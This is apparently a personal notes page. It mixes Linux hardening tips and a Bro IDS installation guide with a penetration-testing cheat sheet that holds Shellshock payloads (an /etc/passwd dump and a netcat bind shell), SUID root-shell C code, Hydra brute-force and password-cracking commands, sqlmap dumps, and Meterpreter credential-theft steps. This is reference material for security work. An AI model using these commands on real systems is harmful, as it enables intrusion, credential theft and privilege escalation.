The “unhide” command used by rkhunter!

The unhide command for RKHUNTER in CentOS 7 must be installed with the following “Yum” command:

yum install unhide unhide-tcp

I have detected that rkhunter need this file to be able to unhide stuff!

Info: Starting test name ‘malware’
Performing malware checks
Info: Test ‘deleted_files’ disabled at users request.
Info: Starting test name ‘running_procs’
Checking running processes for suspicious files [ None found ]
Info: Starting test name ‘hidden_procs’
Info: Unable to find the ‘unhide’ command
Info: Unable to find the ‘unhide-linux’ command
Checking for hidden processes
[ Skipped ]

rkhunter command line

rkhunter help

Have Phun!

YUM Commands

YUM Commands

Package manager used by RPM based systems, you can pull some usefull information about installed packages and or install additional tools.

COMMAND DESCRIPTION
yum update Update all RPM packages with YUM, also shows whats out of date.
yum update httpd Update individual packages, in this example HTTPD (Apache).
yum install package Install a package using YUM.
yum --exclude=package kernel* update Exclude a package from being updates with YUM.
yum remove package Remove package with YUM.
yum erase package Remove package with YUM.
yum list package Lists info about yum package.
yum provides httpd What a packages does, e.g Apache HTTPD Server.
yum info httpd Shows package info, architecture, version etc.
yum localinstall blah.rpm Use YUM to install local RPM, settles deps from repo.
yum deplist package Shows deps for a package.
yum list installed | more List all installed packages.
yum grouplist | more Show all YUM groups.
yum groupinstall 'Development Tools' Install YUM group.

CentOS 7 System Information Commands

System Information Commands

Useful for local enumeration.

COMMAND DESCRIPTION
whoami Shows currently logged in user on Linux.
id Shows currently logged in user and groups for the user.
last Shows last logged in users.
mount Show mounted drives.
df -h Shows disk usage in human readable output.
echo "user:passwd" | chpasswd Reset password in one line.
getent passwd List users on Linux.
strings /usr/local/bin/blah Shows contents of none text files, e.g. whats in a binary.
uname -ar Shows running kernel version.
PATH=$PATH:/my/new-path Add a new PATH, handy for local FS manipulation.
history Show bash history, commands the user has entered previously.

Sysctl Security

#nano /etc/sysctl.conf

net.ipv4.ip_forward = 0
net.ipv4.conf.all.send_redirects = 0
net.ipv4.conf.default.send_redirects = 0
net.ipv4.tcp_max_syn_backlog = 1280
net.ipv4.icmp_echo_ignore_broadcasts = 1
net.ipv4.conf.all.accept_source_route = 0
net.ipv4.conf.all.accept_redirects = 0
net.ipv4.conf.all.secure_redirects = 0
net.ipv4.conf.all.log_martians = 1
net.ipv4.conf.default.accept_source_route = 0
net.ipv4.conf.default.accept_redirects = 0
net.ipv4.conf.default.secure_redirects = 0
net.ipv4.icmp_echo_ignore_broadcasts = 1
net.ipv4.icmp_ignore_bogus_error_responses = 1
net.ipv4.tcp_syncookies = 1
net.ipv4.conf.all.rp_filter = 1
net.ipv4.conf.default.rp_filter = 1
net.ipv4.tcp_timestamps = 0

Notes

BOF / Exploit

Exploit Research

Find exploits for enumerated hosts / services.

COMMAND DESCRIPTION
searchsploit windows 2003 | grep -i local Search exploit-db for exploit, in this example windows 2003 + local esc
site:exploit-db.com exploit kernel <= 3 Use google to search exploit-db.com for exploits
grep -R "W7" /usr/share/metasploit-framework
/modules/exploit/windows/*
Search metasploit modules using grep – msf search sucks a bit

Searching for Exploits

Install local copy of exploit-db:

 searchsploit –u
 searchsploit apache 2.2
 searchsploit "Linux Kernel"
 searchsploit linux 2.6 | grep -i ubuntu | grep local

Compiling Windows Exploits on Kali

  wget -O mingw-get-setup.exe http://sourceforge.net/projects/mingw/files/Installer/mingw-get-setup.exe/download
  wine mingw-get-setup.exe
  select mingw32-base
  cd /root/.wine/drive_c/windows
  wget http://gojhonny.com/misc/mingw_bin.zip && unzip mingw_bin.zip
  cd /root/.wine/drive_c/MinGW/bin
  wine gcc -o ability.exe /tmp/exploit.c -lwsock32
  wine ability.exe  

Cross Compiling Exploits

gcc -m32 -o output32 hello.c (32 bit)
gcc -m64 -o output hello.c (64 bit)

Exploiting Common Vulnerabilities

Exploiting Shellshock

A tool to find and exploit servers vulnerable to Shellshock:

git clone https://github.com/nccgroup/shocker
./shocker.py -H TARGET  --command "/bin/cat /etc/passwd" -c /cgi-bin/status --verbose
cat file (view file contents)
echo -e "HEAD /cgi-bin/status HTTP/1.1\r\nUser-Agent: () { :;}; echo \$(</etc/passwd)\r\nHost: vulnerable\r\nConnection: close\r\n\r\n" | nc TARGET 80
Shell Shock run bind shell
echo -e "HEAD /cgi-bin/status HTTP/1.1\r\nUser-Agent: () { :;}; /usr/bin/nc -l -p 9999 -e /bin/sh\r\nHost: vulnerable\r\nConnection: close\r\n\r\n" | nc TARGET 80
Shell Shock reverse Shell
nc -l -p 443

Simple Local Web Servers

Python local web server command, handy for serving up shells and exploits on an attacking machine.

COMMAND DESCRIPTION
python -m SimpleHTTPServer 80 Run a basic http server, great for serving up shells etc
python3 -m http.server Run a basic Python3 http server, great for serving up shells etc
ruby -rwebrick -e "WEBrick::HTTPServer.new
(:Port => 80, :DocumentRoot => Dir.pwd).start"
Run a ruby webrick basic http server
php -S 0.0.0.0:80 Run a basic PHP http server

Mounting File Shares

How to mount NFS / CIFS, Windows and Linux file shares.

COMMAND DESCRIPTION
mount 192.168.1.1:/vol/share /mnt/nfs Mount NFS share to /mnt/nfs
mount -t cifs -o username=user,password=pass
,domain=blah //192.168.1.X/share-name /mnt/cifs
Mount Windows CIFS / SMB share on Linux at /mnt/cifs if you remove password it will prompt on the CLI (more secure as it wont end up in bash_history)
net use Z: \\win-server\share password
/user:domain\janedoe /savecred /p:no
Mount a Windows share on Windows from the command line
apt-get install smb4k -y Install smb4k on Kali, useful Linux GUI for browsing SMB shares

HTTP / HTTPS Webserver Enumeration

COMMAND DESCRIPTION
nikto -h 192.168.1.1 Perform a nikto scan against target
dirbuster Configure via GUI, CLI input doesn’t work most of the time

Packet Inspection

COMMAND DESCRIPTION
tcpdump tcp port 80 -w output.pcap -i eth0 tcpdump for port 80 on interface eth0, outputs to output.pcap

Username Enumeration

Some techniques used to remotely enumerate users on a target system.

SMB User Enumeration

COMMAND DESCRIPTION
python /usr/share/doc/python-impacket-doc/examples
/samrdump.py 192.168.XXX.XXX
Enumerate users from SMB
ridenum.py 192.168.XXX.XXX 500 50000 dict.txt RID cycle SMB / enumerate users from SMB

SNMP User Enumeration

COMMAND DESCRIPTION
snmpwalk public -v1 192.168.X.XXX 1 |grep 77.1.2.25
|cut -d” “ -f4
Enmerate users from SNMP
python /usr/share/doc/python-impacket-doc/examples/
samrdump.py SNMP 192.168.X.XXX
Enmerate users from SNMP
nmap -sT -p 161 192.168.X.XXX/254 -oG snmp_results.txt
(then grep)
Search for SNMP servers with nmap, grepable output

Passwords

Wordlists

COMMAND DESCRIPTION
/usr/share/wordlists Kali word lists

Brute Forcing Services

Hydra FTP Brute Force

COMMAND DESCRIPTION
hydra -l USERNAME -P /usr/share/wordlistsnmap.lst -f
192.168.X.XXX ftp -V
Hydra FTP brute force

Hydra POP3 Brute Force

COMMAND DESCRIPTION
hydra -l USERNAME -P /usr/share/wordlistsnmap.lst -f
192.168.X.XXX pop3 -V
Hydra POP3 brute force

Hydra SMTP Brute Force

COMMAND DESCRIPTION
hydra -P /usr/share/wordlistsnmap.lst 192.168.X.XXX smtp -V Hydra SMTP brute force

Use -t to limit concurrent connections, example: -t 15

Password Cracking

John The Ripper – JTR

COMMAND DESCRIPTION
john --wordlist=/usr/share/wordlists/rockyou.txt hashes JTR password cracking
john --format=descrypt --wordlist
/usr/share/wordlists/rockyou.txt hash.txt
JTR forced descrypt cracking with wordlist
john --format=descrypt hash --show JTR forced descrypt brute force cracking

Windows Penetration Testing Commands

See Windows Penetration Testing Commands.

Linux Penetration Testing Commands

See Linux Commands Cheat Sheet (right hand menu) for a list of Linux Penetration testing commands, useful for local system enumeration.

Compiling Exploits

Some notes on compiling exploits.

Identifying if C code is for Windows or Linux

C #includes will indicate which OS should be used to build the exploit.

COMMAND DESCRIPTION
process.h, string.h, winbase.h, windows.h, winsock2.h Windows exploit code
arpa/inet.h, fcntl.h, netdb.h, netinet/in.h,
sys/sockt.h, sys/types.h, unistd.h
Linux exploit code

Build Exploit GCC

Compile exploit gcc.

COMMAND DESCRIPTION
gcc -o exploit exploit.c Basic GCC compile

GCC Compile 32Bit Exploit on 64Bit Kali

Handy for cross compiling 32 bit binaries on 64 bit attacking machines.

COMMAND DESCRIPTION
gcc -m32 exploit.c -o exploit Cross compile 32 bit binary on 64 bit Linux

Compile Windows .exe on Linux

Build / compile windows exploits on Linux, resulting in a .exe file.

COMMAND DESCRIPTION
i586-mingw32msvc-gcc exploit.c -lws2_32 -o exploit.exe Compile windows .exe on Linux

SUID Binary

Often SUID C binary files are required to spawn a shell as a superuser, you can update the UID / GID and shell as required.

below are some quick copy and pate examples for various shells:

SUID C Shell for /bin/bash

int main(void){
       setresuid(0, 0, 0);
       system("/bin/bash");
}       

SUID C Shell for /bin/sh

int main(void){
       setresuid(0, 0, 0);
       system("/bin/sh");
}       

Building the SUID Shell binary

gcc -o suid suid.c  

For 32 bit:

gcc -m32 -o suid suid.c  

Reverse Shells

See Reverse Shell Cheat Sheet for a list of useful Reverse Shells.

TTY Shells

Tips / Tricks to spawn a TTY shell from a limited shell in Linux, useful for running commands like su from reverse shells.

Python TTY Shell Trick

python -c 'import pty;pty.spawn("/bin/bash")'
echo os.system('/bin/bash')

Spawn Interactive sh shell

/bin/sh -i

Spawn Perl TTY Shell

exec "/bin/sh";
perl e 'exec "/bin/sh";'

Spawn Ruby TTY Shell

exec "/bin/sh"

Spawn Lua TTY Shell

os.execute('/bin/sh')

Spawn TTY Shell from Vi

Run shell commands from vi:

:!bash

Spawn TTY Shell NMAP

!sh

Metasploit

Some basic Metasploit stuff, that I have found handy for reference.

Basic Metasploit commands, useful for reference, for pivoting see – Meterpreter Pivoting techniques.

Meterpreter Payloads

Windows reverse meterpreter payload

COMMAND DESCRIPTION
set payload windows/meterpreter/reverse_tcp Windows reverse tcp payload

Windows VNC Meterpreter payload

COMMAND DESCRIPTION
set payload windows/vncinject/reverse_tcp

set ViewOnly false

Meterpreter Windows VNC Payload

Linux Reverse Meterpreter payload

COMMAND DESCRIPTION
set payload linux/meterpreter/reverse_tcp Meterpreter Linux Reverse Payload

Meterpreter Cheat Sheet

Useful meterpreter commands.

COMMAND DESCRIPTION
upload file c:\\windows Meterpreter upload file to Windows target
download c:\\windows\\repair\\sam /tmp Meterpreter download file from Windows target
download c:\\windows\\repair\\sam /tmp Meterpreter download file from Windows target
execute -f c:\\windows\temp\exploit.exe Meterpreter run .exe on target – handy for executing uploaded exploits
execute -f cmd -c Creates new channel with cmd shell
ps Meterpreter show processes
shell Meterpreter get shell on the target
getsystem Meterpreter attempts priviledge escalation the target
hashdump Meterpreter attempts to dump the hashes on the target
portfwd add –l 3389 –p 3389 –r target Meterpreter create port forward to target machine
portfwd delete –l 3389 –p 3389 –r target Meterpreter delete port forward

Common Metasploit Modules

Top metasploit modules.

Remote Windows Metasploit Modules (exploits)

COMMAND DESCRIPTION
use exploit/windows/smb/ms08_067_netapi MS08_067 Windows 2k, XP, 2003 Remote Exploit
use exploit/windows/dcerpc/ms06_040_netapi MS08_040 Windows NT, 2k, XP, 2003 Remote Exploit
use exploit/windows/smb/
ms09_050_smb2_negotiate_func_index
MS09_050 Windows Vista SP1/SP2 and Server 2008 (x86) Remote Exploit

Local Windows Metasploit Modules (exploits)

COMMAND DESCRIPTION
use exploit/windows/local/bypassuac Bypass UAC on Windows 7 + Set target + arch, x86/64

Auxilary Metasploit Modules

COMMAND DESCRIPTION
use auxiliary/scanner/http/dir_scanner Metasploit HTTP directory scanner
use auxiliary/scanner/http/jboss_vulnscan Metasploit JBOSS vulnerability scanner
use auxiliary/scanner/mssql/mssql_login Metasploit MSSQL Credential Scanner
use auxiliary/scanner/mysql/mysql_version Metasploit MSSQL Version Scanner
use auxiliary/scanner/oracle/oracle_login Metasploit Oracle Login Module

Metasploit Powershell Modules

COMMAND DESCRIPTION
use exploit/multi/script/web_delivery Metasploit powershell payload delivery module
post/windows/manage/powershell/exec_powershell Metasploit upload and run powershell script through a session
use exploit/multi/http/jboss_maindeployer Metasploit JBOSS deploy
use exploit/windows/mssql/mssql_payload Metasploit MSSQL payload

Post Exploit Windows Metasploit Modules

Windows Metasploit Modules for privilege escalation.

COMMAND DESCRIPTION
run post/windows/gather/win_privs Metasploit show privileges of current user
use post/windows/gather/credentials/gpp Metasploit grab GPP saved passwords
load mimikatz -> wdigest Metasplit load Mimikatz
run post/windows/gather/local_admin_search_enum Idenitfy other machines that the supplied domain user has administrative access to
run post/windows/gather/smart_hashdump Automated dumping of sam file, tries to esc privileges etc

ASCII Table Cheat Sheet

Useful for Web Application Penetration Testing, or if you get stranded on Mars and need to communicate with NASA.

ASCII CHARACTER
x00 Null Byte
x08 BS
x09 TAB
x0a LF
x0d CR
x1b ESC
x20 SPC
x21 !
x22
x23 #
x24 $
x25 %
x26 &
x27 `
x28 (
x29 )
x2a *
x2b +
x2c ,
x2d
x2e .
x2f /
x30 0
x31 1
x32 2
x33 3
x34 4
x35 5
x36 6
x37 7
x38 8
x39 9
x3a :
x3b ;
x3c <
x3d =
x3e >
x3f ?
x40 @
x41 A
x42 B
x43 C
x44 D
x45 E
x46 F
x47 G
x48 H
x49 I
x4a J
x4b K
x4c L
x4d M
x4e N
x4f O
x50 P
x51 Q
x52 R
x53 S
x54 T
x55 U
x56 V
x57 W
x58 X
x59 Y
x5a Z
x5b [
x5c \
x5d ]
x5e ^
x5f _
x60 `
x61 a
x62 b
x63 c
x64 d
x65 e
x66 f
x67 g
x68 h
x69 i
x6a j
x6b k
x6c l
x6d m
x6e n
x6f o
x70 p
x71 q
x72 r
x73 s
x74 t
x75 u
x76 v
x77 w
x78 x
x79 y
x7a z

CISCO IOS Commands

A collection of useful Cisco IOS commands.

COMMAND DESCRIPTION
enable Enters enable mode
conf t Short for, configure terminal
(config)# interface fa0/0 Configure FastEthernet 0/0
(config-if)# ip addr 0.0.0.0 255.255.255.255 Add ip to fa0/0
(config-if)# ip addr 0.0.0.0 255.255.255.255 Add ip to fa0/0
(config-if)# line vty 0 4 Configure vty line
(config-line)# login Cisco set telnet password
(config-line)# password YOUR-PASSWORD Set telnet password
# show running-config Show running config loaded in memory
# show startup-config Show sartup config
# show version show cisco IOS version
# show session display open sessions
# show ip interface Show network interfaces
# show interface e0 Show detailed interface info
# show ip route Show routes
# show access-lists Show access lists
# dir file systems Show available files
# dir all-filesystems File information
# dir /all SHow deleted files
# terminal length 0 No limit on terminal output
# copy running-config tftp Copys running config to tftp server
# copy running-config startup-config Copy startup-config to running-config

Cryptography

Hash Lengths

HASH SIZE
MD5 Hash Length 16 Bytes
SHA-1 Hash Length 20 Bytes
SHA-256 Hash Length 32 Bytes
SHA-512 Hash Length 64 Bytes

Hash Examples

Likely just use hash-identifier for this but here are some example hashes:

HASH EXAMPLE
MD5 Hash Example 8743b52063cd84097a65d1633f5c74f5
MD5 $PASS:$SALT Example 01dfae6e5d4d90d9892622325959afbe:7050461
MD5 $SALT:$PASS f0fda58630310a6dd91a7d8f0a4ceda2:4225637426
SHA1 Hash Example b89eaac7e61417341b710b727768294d0e6a277b
SHA1 $PASS:$SALT 2fc5a684737ce1bf7b3b239df432416e0dd07357:2014
SHA1 $SALT:$PASS cac35ec206d868b7d7cb0b55f31d9425b075082b:5363620024
SHA-256 127e6fbfe24a750e72930c220a8e138275656b
8e5d8f48a98c3c92df2caba935
SHA-256 $PASS:$SALT c73d08de890479518ed60cf670d17faa26a4a7
1f995c1dcc978165399401a6c4
SHA-256 $SALT:$PASS eb368a2dfd38b405f014118c7d9747fcc97f4
f0ee75c05963cd9da6ee65ef498:560407001617
SHA-512 82a9dda829eb7f8ffe9fbe49e45d47d2dad9
664fbb7adf72492e3c81ebd3e29134d9bc
12212bf83c6840f10e8246b9db54a4
859b7ccd0123d86e5872c1e5082f
SHA-512 $PASS:$SALT e5c3ede3e49fb86592fb03f471c35ba13e8
d89b8ab65142c9a8fdafb635fa2223c24e5
558fd9313e8995019dcbec1fb58414
6b7bb12685c7765fc8c0d51379fd
SHA-512 $SALT:$PASS 976b451818634a1e2acba682da3fd6ef
a72adf8a7a08d7939550c244b237c72c7d4236754
4e826c0c83fe5c02f97c0373b6b1
386cc794bf0d21d2df01bb9c08a
NTLM Hash Example b4b9b02e6f09a9bd760f388b67351e2b

SQLMap Examples

COMMAND DESCRIPTION
sqlmap -u http://meh.com --forms --batch --crawl=10
--cookie=jsessionid=54321 --level=5 --risk=3
Automated sqlmap scan
sqlmap -u TARGET -p PARAM --data=POSTDATA --cookie=COOKIE
--level=3 --current-user --current-db --passwords
--file-read="/var/www/blah.php"
Targeted sqlmap scan
sqlmap -u "http://meh.com/meh.php?id=1"
--dbms=mysql --tech=U --random-agent --dump
Scan url for union + error based injection with mysql backend
and use a random user agent + database dump
sqlmap -o -u "http://meh.com/form/" --forms sqlmap check form for injection
sqlmap -o -u "http://meh/vuln-form" --forms
-D database-name -T users --dump
sqlmap dump and crack hashes for table users on database-name.

Notes

Disable core dumps for all users

#nano /etc/security/limits.conf

* hard core 0

Disable core dumps for SUID programs

#sysctl -w fs.suid_dumpable=0
#fs.suid_dumpable = 0

Set runtime for fs.suid_dumpable
#sysctl -q -n -w fs.suid_dumpable=0

If fs.suid_dumpable present in /etc/sysctl.conf, change value to “0”
else, add “fs.suid_dumpable = 0” to /etc/sysctl.conf

if grep –silent ^fs.suid_dumpable /etc/sysctl.conf ; then sed -i ‘s/^fs.suid_dumpable.*/fs.suid_dumpable = 0/g’ /etc/sysctl.conf else echo “” >> /etc/sysctl.conf echo “# Set fs.suid_dumpable to 0 per security requirements” >> /etc/sysctl.conf echo “fs.suid_dumpable = 0” >> /etc/sysctl.conf
fi

Buffer Overflow Protection

This section helps mitigate against Buffer Overflow attacks (BOF).

Enable ExecShield

Helps prevent stack smashing / BOF.

Enable on current kernel: sysctl -w kernel.exec-shield=1

Add to /etc/sysctl.conf:

kernel.exec-shield = 1

Check / Enable ASLR

Set runtime for kernel.randomize_va_space sysctl -q -n -w kernel.randomize_va_space=2

Add kernel.randomize_va_space = 2 to /etc/sysctl.conf if it does not already exist.

Enable XD or NX Support on x86 Systems

Recent processors in the x86 family support the ability to prevent code execution on a per memory page basis. Generically and on AMD processors, this ability is called No Execute (NX), while on Intel processors it is called Execute Disable (XD). This ability can help prevent exploitation of buffer overflow vulnerabilities and should be activated whenever possible. Extra steps must be taken to ensure that this protection is enabled, particularly on 32-bit x86 systems. Other processors, such as Itanium and POWER, have included such support since inception and the standard kernel for those platforms supports the feature.

Check bios and ensure XD/NX is enabled, not relevant for VM’s.

Disable SSH Support for .rhosts Files

SSH can emulate the behavior of the obsolete rsh command in allowing users to enable insecure access to their accounts via .rhosts files.

To ensure this behavior is disabled, add or correct the following line in /etc/ssh/sshd_config:

IgnoreRhosts yes

 

Let’s Encrypt!

We’re making it possible for everyone to experience a secure and privacy-respecting Web. We make it easy to get certificates for HTTPS, because ease of use is critical for adoption. We provide certificates free of charge, because cost excludes people. Our certificates are available in every country in the world, because the secure Web is for everyone. We strive to be open and transparent, because these values are essential for trust.

https://letsencrypt.org/donate/

Quality open source alternative to SonicWALL and WatchGuard

Untangle’s Firewall filters traffic based on IP address, protocol and ports and allows administrators to designate which systems and services (http, ftp, etc.) are publicly available, create a DMZ and perform NAT (with Router), and run as a transparent bridge to complement existing hardware.

Untangle is much more than a firewall. It is, in fact, a Linux distribution that includes a host of software written by other developers. Software includes a Web Filter, Spam Blocker, Spyware Blocker, Virus Blocker, Phish Blocker, Instrusion Prevention, Attack Blocker, OpenVPN, Router, Untangle Reports, and Untangle Platform.

Features include:

  • Blocks sessions based on simple rules
  • Rules can be based on a variety of attributes
  • Custom logging, blocking or passing rules can be created by:
    • protocol
    • direction
    • source address
    • destination address
    • source port
    • destination port

Source : https://www.untangle.com/

Install Bro on CentOS 7.X/6.X

Required Dependencies

Bro requires following dependancies to work properly

  • Libpcap   (Package name=libpcap-devel)
  • OpenSSL libraries (openssl-devel)
  • BIND8 library (already installed in centos)
  • Libz (already install in centos)
  • Bash (for BroControl)
  • Python (for BroControl) (python-devel)

To build Bro from source following addition dependancies are required

Let us install all of above dependancies first

sudo yum install cmake make gcc gcc-c++ flex bison libpcap-devel openssl-devel python-devel swig zlib-devel perl

Optional Dependencies

Following are the optional dependancies, bro can make use of them if they are availble at build time

  • LibGeoIP (for geolocating IP addresses)
  • sendmail (enables Bro and BroControl to send mail)
  • gawk (enables all features of bro-cut)
  • curl (used by a Bro script that implements active HTTP)
  • gperftools (tcmalloc is used to improve memory and CPU usage)
  • ipsumdump (for trace-summary; http://www.cs.ucla.edu/~kohler/ipsumdump)
  • Ruby executable, library, and headers (for Broccoli Ruby bindings)

LibgeoIP

During the process of creating policy scripts the need may arise to find the geographic location for an IP address. Bro has support for the GeoIP library at the policy script level beginning with release 1.3 to account for this need. To use this functionality, you need to first install the libGeoIP software, and then install the GeoLite city database before building Bro.

Libgeoip allows bro to

sudo yum install GeoIP-devel

A country database for GeoIPLite is included when you do the C API install, but for Bro, we are using the city database which includes cities and regions in addition to countries.

Download the GeoLite city binary database.

wget http://geolite.maxmind.com/download/geoip/database/GeoLiteCity.dat.gz
#unzip the database
gunzip GeoLiteCity.dat.gz

move data base to required diretory

 sudo mv GeoLiteCity.dat /usr/share/GeoIP/GeoIPCity.dat

Install gawk

GNU implementation of famous awk utility

sudo yum install gawk

Install gperftools(google performance tools)

Gperftools is a collection of a high-performance multi-threaded malloc() implementation, plus some pretty nifty performance analysis tools

sudo yum install gperftools

Ipsumdump

The ipsumdump program reads IP packets from one or more data sources, then summarizes those packets into a line-based ASCII file. The resulting summary dump is easy to process with text-based tools

#Download the latest version from here 
wget http://www.read.seas.harvard.edu/~kohler/ipsumdump/ipsumdump-1.85.tar.gz
tar -xvf ipsumdump-1.85.tar.gz
cd ipsumdump-1.85
./configure --prefix=/usr/
make 
sudo make install

Install Bro

Download the latest version from here

wget https://www.bro.org/downloads/release/bro-2.5.tar.gz
tar -xvf bro-2.5.tar.gz

Now change to this directory 
/bro/bro-2.5   assuming you created a /bro/ and install in this directory!
./configure
make
sudo make install

The installation will take a while!

by default bro will be install to /usr/local/bro/bin

Modifiy you PATH environment variable to include bro binaries

export PATH=/usr/local/bro/bin:$PATH

To make changes permanent add above line to ~/.bashrc file

A Minimal Starting Configuration

These are the basic configuration changes to make for a minimal BroControl installation that will manage a single Bro instance on the localhost:

  1. In $PREFIX/etc/node.cfg, set the right interface to monitor.
  2. In $PREFIX/etc/networks.cfg, comment out the default settings and add the networks that Bro will consider local to the monitored environment.
  3. In $PREFIX/etc/broctl.cfg, change the MailTo email address to a desired recipient and the LogRotationInterval to a desired log archival frequency.

Now start the BroControl shell like:

broctl

Since this is the first-time use of the shell, perform an initial installation of the BroControl configuration:

[BroControl] > install

Then start up a Bro instance:

[BroControl] > start

If there are errors while trying to start the Bro instance, you can can view the details with the diag command. If started successfully, the Bro instance will begin analyzing traffic according to a default policy and output the results in $PREFIX/logs.

Note

The user starting BroControl needs permission to capture network traffic. If you are not root, you may need to grant further privileges to the account you’re using; see the FAQ. Also, if it looks like Bro is not seeing any traffic, check out the FAQ entry on checksum offloading.

You can leave it running for now, but to stop this Bro instance you would do:

[BroControl] > stop

Browsing Log Files

By default, logs are written out in human-readable (ASCII) format and data is organized into columns (tab-delimited). Logs that are part of the current rotation interval are accumulated in $PREFIX/logs/current/ (if Bro is not running, the directory will be empty). For example, the http.log contains the results of Bro HTTP protocol analysis. Here are the first few columns of http.log:

# ts          uid          orig_h        orig_p  resp_h         resp_p
1311627961.8  HSH4uV8KVJg  192.168.1.100 52303   192.150.187.43 80

Logs that deal with analysis of a network protocol will often start like this: a timestamp, a unique connection identifier (UID), and a connection 4-tuple (originator host/port and responder host/port). The UID can be used to identify all logged activity (possibly across multiple log files) associated with a given connection 4-tuple over its lifetime.

The remaining columns of protocol-specific logs then detail the protocol-dependent activity that’s occurring. E.g. http.log‘s next few columns (shortened for brevity) show a request to the root of Bro website:

# method   host         uri  referrer  user_agent
GET        bro.org  /    -         <...>Chrome/12.0.742.122<...>

Some logs are worth explicit mention:

conn.log
Contains an entry for every connection seen on the wire, with basic properties such as time and duration, originator and responder IP addresses, services and ports, payload size, and much more. This log provides a comprehensive record of the network’s activity.
notice.log
Identifies specific activity that Bro recognizes as potentially interesting, odd, or bad. In Bro-speak, such activity is called a “notice”.

By default, BroControl regularly takes all the logs from $PREFIX/logs/current and archives/compresses them to a directory named by date, e.g. $PREFIX/logs/2011-10-06. The frequency at which this is done can be configured via the LogRotationInterval option in $PREFIX/etc/broctl.cfg

Bro as a Command-Line Utility

If you prefer not to use BroControl (e.g. don’t need its automation and management features), here’s how to directly control Bro for your analysis activities from the command line for both live traffic and offline working from traces.

Monitoring Live Traffic

Analyzing live traffic from an interface is simple:

bro -i en0 <list of scripts to load>

en0 can be replaced by the interface of your choice and for the list of scripts, you can just use “all” for now to perform all the default analysis that’s available.

Bro will output log files into the working directory.

Note

The FAQ entries about capturing as an unprivileged user and checksum offloading are particularly relevant at this point.

To use the site-specific local.bro script, just add it to the command-line:

bro -i en0 local

This will cause Bro to print a warning about lacking the Site::local_nets variable being configured. You can supply this information at the command line like this (supply your “local” subnets in place of the example subnets):

bro -r mypackets.trace local "Site::local_nets += { 1.2.3.0/24, 5.6.7.0/24 }"

Reading Packet Capture (pcap) Files

Capturing packets from an interface and writing them to a file can be done like this:

sudo tcpdump -i en0 -s 0 -w mypackets.trace

Where en0 can be replaced by the correct interface for your system as shown by e.g. ifconfig. (The -s 0 argument tells it to capture whole packets; in cases where it’s not supported use -s 65535 instead).

After a while of capturing traffic, kill the tcpdump (with ctrl-c), and tell Bro to perform all the default analysis on the capture which primarily includes :

bro -r mypackets.trace

Bro will output log files into the working directory.

If you are interested in more detection, you can again load the local script that we include as a suggested configuration:

bro -r mypackets.trace local

Telling Bro Which Scripts to Load

A command-line invocation of Bro typically looks like:

bro <options> <policies...>

Where the last arguments are the specific policy scripts that this Bro instance will load. These arguments don’t have to include the .bro file extension, and if the corresponding script resides under the default installation path, $PREFIX/share/bro, then it requires no path qualification. Further, a directory of scripts can be specified as an argument to be loaded as a “package” if it contains a __load__.bro script that defines the scripts that are part of the package.

This example does all of the base analysis (primarily protocol logging) and adds SSL certificate validation.

bro -r mypackets.trace protocols/ssl/validate-certs

You might notice that a script you load from the command line uses the @load directive in the Bro language to declare dependence on other scripts. This directive is similar to the #include of C/C++, except the semantics are, “load this script if it hasn’t already been loaded.”

Note

If one wants Bro to be able to load scripts that live outside the default directories in Bro’s installation root, the BROPATH environment variable will need to be extended to include all the directories that need to be searched for scripts. See the default search path by doing bro --help.

Running Bro Without Installing

For developers that wish to run Bro directly from the build/ directory (i.e., without performing make install), they will have to first adjust BROPATH to look for scripts and additional files inside the build directory. Sourcing either build/bro-path-dev.sh or build/bro-path-dev.csh as appropriate for the current shell accomplishes this and also augments your PATH so you can use the Bro binary directly:

./configure
make
source build/bro-path-dev.sh
bro <options>
Video Tutorial

Have fun!